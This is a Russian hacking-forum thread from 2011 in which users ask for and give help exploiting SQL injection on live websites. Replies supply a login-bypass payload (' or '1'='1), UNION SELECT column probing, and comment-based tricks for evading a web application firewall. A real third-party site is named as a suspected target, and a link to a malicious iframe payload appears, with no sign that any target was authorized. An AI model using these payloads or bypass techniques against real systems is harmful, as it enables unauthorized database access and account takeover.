HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18561  
Старый 13.11.2011, 16:54
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
и не получится..прав то нет у юзверя бд на запись...
шелл залить есть возможность ,но по другому
Отпиши пожалуйста как
 
Ответить с цитированием

  #18562  
Старый 13.11.2011, 17:42
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию

Нашел Xss в input.

Фильтруется
[/CODE]
 
Ответить с цитированием

  #18563  
Старый 13.11.2011, 18:49
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от EST a1ien  
EST a1ien said:
Нашел Xss в input.
Фильтруется
[/CODE]
 
Ответить с цитированием

  #18564  
Старый 14.11.2011, 13:24
Shimon
Guest
Сообщений: n/a
Провел на форуме:
204

Репутация: 0
По умолчанию

Добрый день.

Есть логин-форма.

При подстановке кавычки в любое из полей выдается:

MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')


логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.

Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет

SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')


если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".

Как тут можно в эту BINARY инжектнуться?
 
Ответить с цитированием

  #18565  
Старый 14.11.2011, 15:13
gigan
Guest
Сообщений: n/a
Провел на форуме:
229

Репутация: 0
По умолчанию

Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae

я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?
 
Ответить с цитированием

  #18566  
Старый 14.11.2011, 15:34
s000r
Guest
Сообщений: n/a
Провел на форуме:
2918

Репутация: 0
По умолчанию

Всем добрый день.

Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...

http://powerdefence.ru/Uslugi_dlya_Yur_lic'
 
Ответить с цитированием

  #18567  
Старый 14.11.2011, 18:19
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Как обойти фаервол / фильтр при проведение SQL-инъекции?

Запросы вида: =-1'+order+by+10+--+

=-1'/*--*/order/*--*/by/*--*/10--

=-1'+OrDer+By+10+--+

При всех этих запросах пишет: Соединение было сброшено
 
Ответить с цитированием

  #18568  
Старый 14.11.2011, 20:37
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')

2 aydin-ka:

=-1'/**//*!order*//**//*!by*//**/10--+

Так пробовал? Все зависит от того, где именно происходит фильтрация.
 
Ответить с цитированием

  #18569  
Старый 14.11.2011, 23:15
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Пробуй GROUP BY

или тупо

UNION SELECT 1 --

UNION SELECT 1,2 --

UNION SELECT 1,2,3 --

UNION SELECT 1,2,3,......,N --

Цитата:
Сообщение от Shimon  
Shimon said:
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')

логин
и
пасс
- то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля
admin' or 1=1 --
то на выходе и будет
SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')

если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?
В оба поля: ' or '1'='1
 
Ответить с цитированием

  #18570  
Старый 14.11.2011, 23:35
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Код:
Code:
(-1')order(by)10--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ